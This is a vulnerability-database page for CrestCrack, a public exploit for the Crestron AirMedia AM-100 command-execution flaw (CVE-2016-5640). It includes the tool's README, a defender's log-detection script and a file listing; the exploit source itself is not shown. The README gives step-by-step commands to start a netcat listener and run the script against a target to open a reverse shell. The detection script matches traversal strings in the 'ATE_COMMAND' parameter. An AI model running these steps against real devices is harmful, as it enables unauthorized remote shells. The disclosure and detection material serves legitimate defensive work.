PoC details: a878844fb07b8c514adaadca09a0d6d7fb4429bc

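Source
Related vulnerability
Title: Crestron AirMedia AM-100 directory traversal vulnerability (CVE-2016-5640)
Description: Crestron AirMedia AM-100 is a smart home gateway product from the US company Crestron Electronics. A directory traversal vulnerability exists in the cgi-bin/rftest.cgi file of Crestron AirMedia AM-100 devices running firmware version 1.2.1 and earlier. A remote attacker can exploit it to execute arbitrary commands by means of the directory traversal characters '..' in the 'ATE_COMMAND' parameter.
Description
Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100
Introduction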
![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
# CrestCrack
CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments, CrestCrack uses netcat to create a reverse shell between your target and a netcat listener of your choice.

## Setup:
1. Clone a copy of CrestCrack `git clone https://github.com/vpnguy/CrestCrack`
2. Launch a netcat listener `nc -lvp 1337`
3. Execute CrestCrack against your target with your listener info `./crestcrack.py https://targethost 255.255.255.255 1337`
4. ??????
5. **PROFIT**

### Usage:
**./crestcrack.py *[target host] [listener IP] [listener port]***

### Example:
**./crestcrack.py https://targethost 123.123.123.123 3311**

 

## Additional Vulnerability Information:
[Cylance Vulnerability Disclosure](https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md)

[NIST CVE-2016-5640](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5640)
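
For defenders, the request pattern named in the vulnerability description (`cgi-bin/rftest.cgi` with `..` in `ATE_COMMAND`) can be searched for in proxy or web access logs. The following is an added example, not part of CrestCrack or the advisory; it assumes combined-format logs in which the parameter appears in the logged URL, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path and parameter named in the vulnerability description on this page.
CGI_PATH = "/cgi-bin/rftest.cgi"
PARAM = "ATE_COMMAND"

# Assumption: Apache/nginx "combined" log layout; only the request line is used.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e is still seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (source address, decoded ATE_COMMAND value) for traversal attempts."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("url"))
        if fully_decode(parts.path).lower().rstrip("/") != CGI_PATH:
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(value)
            if name.upper() == PARAM and ".." in value:
                hits.append((m.group("src"), value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2016:10:00:00 +0000] "GET /cgi-bin/rftest.cgi?ATE_COMMAND=..%2F..%2Fexample HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.7 - - [01/Aug/2016:10:00:05 +0000] "GET /cgi-bin/rftest.cgi?ATE_COMMAND=%252e%252e%252fexample HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.20 - - [01/Aug/2016:10:00:09 +0000] "GET /cgi-bin/rftest.cgi?ATE_COMMAND=status HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.30 - - [01/Aug/2016:10:00:12 +0000] "GET /index.html?file=../x HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for src, value in suspicious_requests(SAMPLE_LOG):
        print(f"{src}: traversal sequence in {PARAM}: {value!r}")
```

If the device is reached in a way that keeps the parameter out of the logged URL, the same check has to run where the request body is visible, such as a reverse proxy or network sensor.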

## To be added:
- Error handling/bounds checking
- Enhanced argument support
- --help output

File snapshot

[4.0K] /data/pocs/a878844fb07b8c514adaadca09a0d6d7fb4429bc
├── [1.4K] crestcrack.py
├── [ 34K] LICENSE.md
└── [1.1K] README.md

0 directories, 3 files